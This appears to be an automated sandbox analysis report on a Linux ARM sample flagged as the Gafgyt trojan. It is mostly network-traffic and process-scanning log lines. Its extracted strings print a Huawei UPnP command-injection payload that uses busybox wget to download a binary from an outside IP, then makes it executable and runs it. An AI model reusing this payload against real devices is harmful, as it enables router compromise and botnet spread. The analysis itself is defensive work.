            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930
            Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55660 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41926
            Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41928
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41922
            Source: unknownNetwork traffic detected: HTTP traffic on port 41458 -> 443

            System Summary

            barindex
            Source: huhu.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6254.1.00007fdb48017000.00007fdb48034000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: huhu.arm7.elf PID: 6254, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: huhu.arm7.elfELF static info symbol of initial sample: __gnu_unwind_execute
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.142.182.123 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.142.182.123 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinewgetcurlbusyboxechocatnano
            Source: huhu.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6254.1.00007fdb48017000.00007fdb48034000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: huhu.arm7.elf PID: 6254, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal100.troj.linELF@0/1025@1/0
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1582/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/3088/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/230/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/232/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1579/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1699/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1335/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1698/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1334/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/1576/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/2302/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/236/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/237/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/910/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/912/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/2307/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/918/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/huhu.arm7.elf (PID: 6259)File opened: /proc/15/cmdlineJump to behavior
